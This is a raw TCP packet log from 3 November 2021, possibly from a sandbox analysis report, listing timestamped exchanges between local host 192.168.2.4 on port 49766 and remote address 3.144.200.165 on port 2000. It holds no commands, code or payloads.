Nov 3, 2021 14:44:40.035826921 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035835981 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035854101 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035865068 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035871029 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035890102 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035893917 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035907984 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035917044 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035932064 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035949945 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035955906 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035967112 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035984993 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035993099 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036003113 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036015034 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036020041 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036037922 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036040068 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036056995 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036067963 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036076069 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036092043 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036093950 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036112070 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036123991 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036128998 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036147118 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036149979 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036164999 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036185026 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036190987 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036202908 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036221027 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036225080 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036240101 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036243916 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036258936 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036274910 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036277056 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036290884 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036304951 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036319017 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036334991 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036348104 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036374092 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036402941 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036443949 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036468029 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036480904 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036509037 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036542892 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036602020 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036614895 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036629915 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036689997 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036704063 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036716938 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036731005 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036776066 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036802053 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036812067 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036833048 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036859989 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036868095 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036878109 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036895990 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036904097 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036914110 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036931038 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036947012 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036947966 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036967039 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.036974907 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.036986113 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037003040 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037005901 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037019968 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037036896 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037039042 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037055016 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037065029 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037070990 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037087917 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037106037 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037113905 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037123919 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037142038 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037158012 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037159920 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037174940 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037184954 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037192106 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037209034 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037225008 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037230968 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037244081 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037261009 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037270069 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037278891 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037303925 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037319899 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037332058 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037369967 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037374020 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037388086 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037405968 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037410021 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037424088 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037436962 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037441015 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037457943 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037466049 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037476063 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037492037 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037508965 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037512064 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037538052 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037550926 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037566900 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037578106 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037585020 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037601948 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037609100 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037619114 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037637949 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037650108 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037666082 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037681103 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037694931 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037707090 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037713051 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037729979 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037746906 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037754059 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037763119 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037781000 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037796974 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037797928 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037825108 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037827015 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037844896 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037879944 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037919044 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.037930965 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.037981033 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.040028095 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.040045977 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.040062904 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.040087938 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.040117979 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.044956923 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.044984102 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.045000076 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.045017004 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.045073032 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.045150995 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.045165062 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.188756943 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.188888073 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.188930035 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.188987017 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189013958 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189034939 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189059019 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189080000 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189085007 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189131021 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189168930 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189188004 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189193010 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189238071 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189271927 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189284086 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189315081 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189347029 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189352989 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189395905 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189425945 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189438105 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189481020 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189506054 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189533949 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189552069 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189593077 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189614058 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189646006 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189666986 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189667940 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189713001 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189738035 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189759970 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189785004 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189805031 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189838886 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189853907 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189882040 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189897060 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.189929008 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.189946890 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190040112 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190089941 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190114021 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190134048 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190162897 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190179110 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190200090 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190221071 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190243959 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190267086 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190269947 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190310955 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190332890 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190355062 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190382004 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190402985 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190433025 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190452099 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190478086 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190499067 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190521002 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190552950 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190557957 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190618038 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190642118 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190661907 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190665007 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190711975 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190716982 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190754890 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190790892 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190794945 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190829992 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190835953 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190879107 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190880060 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190908909 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190922022 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190956116 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.190963984 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.190989971 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.191009045 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191040993 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.191061020 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191061974 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.191103935 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191128969 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.191147089 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.191148996 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191194057 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191217899 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.191236019 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191263914 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.191282988 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191306114 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.191324949 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191350937 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.191364050 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.191371918 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191421032 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191462040 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.191477060 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191498995 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.191519976 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191561937 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191602945 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191653013 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.191660881 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191704035 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191734076 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.191884995 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.191904068 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.191957951 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.191992044 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.192053080 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.192109108 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.192114115 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.192166090 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.192230940 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.192233086 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.192292929 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.192348003 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.192351103 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.192408085 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.192506075 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.192512989 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.192563057 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.192620039 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.192665100 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.192701101 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.192758083 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.192792892 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.192819118 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.192898035 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.192898035 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.192956924 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.193012953 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.193017960 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.193067074 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.193120003 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.193126917 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.193181038 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.193240881 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.197468042 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.197508097 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.197557926 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.197598934 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.244040012 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.341429949 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.341489077 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.341522932 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.341557980 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.341593027 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.341661930 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.343353033 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.343508959 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.344070911 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.344115973 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.344155073 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.344193935 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.344233036 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.344249964 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.344288111 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.344347000 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.344355106 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.344403982 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.344420910 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.344449043 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.344489098 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.344489098 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.344531059 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.344577074 CET	2000	49766	3.144.200.165	192.168.2.4
